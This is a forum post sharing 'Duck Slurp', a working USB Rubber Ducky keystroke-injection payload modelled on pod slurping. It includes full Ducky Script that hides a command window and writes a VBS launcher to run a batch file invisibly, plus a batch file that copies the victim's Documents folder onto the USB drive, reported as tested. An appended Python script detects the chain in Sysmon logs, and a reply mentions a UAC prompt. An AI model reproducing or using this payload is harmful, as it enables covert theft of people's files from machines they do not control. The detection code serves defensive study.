[Payload] Duck Slurp payload


overwraith
For anyone who has heard about pod slurping, which is to say an iPod, this works exactly like that. Here is the website that I mostly based my work on:

http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS

Since the USB rubber ducky brings back autorun, it also brings back a form of pod slurping.

To speed up this payload you could use a separate USB drive labeled "DUCKY" in a tandem ducky attack. Other USB drives mount instantly, and can be temporarily fused to the duck with a USB cable splitter. I have also been noticing that the Twin Duck firmware has been getting even faster in mounting the "DUCKY" drive, so the "RunEXE from SD" payload may soon become unnecessary.

The following is a modification of "RunEXE from SD":

REM Author: overwraith
REM Name: DuckSlurp.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
REM Remove the next two lines if you don't place your payloads in separate folders. 
STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
ENTER
STRING START %DUCKYdrive%\DuckSlurp.bat
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

If you do not keep all your payload files in a separate folder on the ducky, and you do keep all files on the root, you will need to remove these lines:

REM Remove the next two lines if you don't place your payloads in separate folders. 
STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
ENTER

In the batch file you will have to remove the small part that says "DuckSlurp" in the line:

set destination=%~d0\DuckSlurp\%COMPUTERNAME%

The following is the batch file which resides in the DuckSlurp folder:

REM File: DuckSlurp.bat
REM Purpose: a duck slurper payload, similar to pod slurping.
REM Original post: http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS
@echo off

REM %0 path to the batch file
REM ~d is the drive

REM Located in the DuckSlurp folder to separate it from other payloads.
set destination=%~d0\DuckSlurp\%COMPUTERNAME%

echo %destination%

mkdir "%destination%"

REM Had to remove support for previous OSes because there is a
REM folder that is exactly the same on Windows 7, only access denied.

REM Windows Vista, and Windows 7
REM Paths are quoted so a user name containing spaces does not break the copy.
if Exist "%USERPROFILE%\Documents" (
xcopy "%USERPROFILE%\Documents" "%destination%"
)

@cls
@exit

This payload now works, and has been tested.
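From the defender's side, as an added example that is not part of the original post: the chain above (a script host launching a batch out of %TEMP%, diskpart polled from that batch, xcopy of a Documents folder to another drive letter) is distinctive enough to match in process-creation telemetry. The script assumes Sysmon Event ID 1 field names and runs over constructed sample records; it is a heuristic, so a legitimate backup of Documents to a second drive would also trip the third stage.

```python
import re
# Field names follow Sysmon Event ID 1 (process creation); all records below are constructed samples.
TEMP_DIR = re.compile(r"\\(?:temp|tmp)\\", re.IGNORECASE)
DOCS_SRC = re.compile(r'"?([A-Za-z]):\\Users\\[^\\"\s]+\\Documents\\?"?', re.IGNORECASE)
DEST_DRIVE = re.compile(r'\s"?([A-Za-z]):\\')

def stages_for(ev):
    """Return the Duck Slurp stages one process-creation event matches (possibly none)."""
    image, cmd = ev.get("Image", "").lower(), ev.get("CommandLine", "")
    parent, pcmd = ev.get("ParentImage", "").lower(), ev.get("ParentCommandLine", "")
    cwd, hits = ev.get("CurrentDirectory", ""), []
    # Stage 1: a script host runs a .vbs out of %TEMP% and hands it a .bat (the invis.vbs launcher).
    if image.endswith(("\\wscript.exe", "\\cscript.exe")) and ".vbs" in cmd.lower() \
            and ".bat" in cmd.lower() and (TEMP_DIR.search(cmd) or TEMP_DIR.search(cwd)):
        hits.append("hidden_batch_launcher")
    # Stage 2: diskpart spawned by a cmd.exe that is running a batch file staged in %TEMP%
    # (DuckyWait.bat polls 'list volume' until a volume labelled DUCKY appears).
    if image.endswith("\\diskpart.exe") and parent.endswith("\\cmd.exe") \
            and ".bat" in pcmd.lower() and TEMP_DIR.search(pcmd):
        hits.append("volume_polling_from_temp_batch")
    # Stage 3: xcopy reads a user's Documents folder and writes it to a different drive letter.
    src = DOCS_SRC.search(cmd)
    if image.endswith("\\xcopy.exe") and src:
        dests = DEST_DRIVE.findall(cmd[src.end():])
        if dests and dests[-1].upper() != src.group(1).upper():
            hits.append("documents_copied_offvolume")
    return hits

def detect(events):
    """Group matching events by stage; flag the host when at least two distinct stages fire."""
    found = {}
    for ev in events:
        for stage in stages_for(ev):
            found.setdefault(stage, []).append(ev)
    return found, len(found) >= 2

SAMPLE_EVENTS = [  # constructed records, not telemetry from a real host
    {"Image": r"C:\Windows\System32\wscript.exe", "CommandLine": "wscript.exe invis.vbs DuckyWait.bat",
     "CurrentDirectory": "C:\\Users\\alice\\AppData\\Local\\Temp\\", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\diskpart.exe", "CommandLine": "diskpart", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\Users\alice\AppData\Local\Temp\DuckyWait.bat" "'},
    {"Image": r"C:\Windows\System32\xcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"xcopy C:\Users\alice\Documents E:\DuckSlurp\WORKSTATION1"},
    {"Image": r"C:\Windows\System32\xcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'xcopy "C:\Users\alice\Documents" "C:\Backup\Documents" /E'},  # same drive: not flagged
]

if __name__ == "__main__":
    stages, flagged = detect(SAMPLE_EVENTS)
    print("flagged" if flagged else "clean", sorted(stages))
```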


Seems like a great Payload. I tested it out and I found out that this version of the Run.exe does not work for me. It brings up a window asking me yes or no if I want to allow diskpart to make changes.

I plugged it into the other Run.exe code and everything ran fine. When the .bat is executed this is what happens.

[screenshot omitted: slurp_zps0156c221.png]
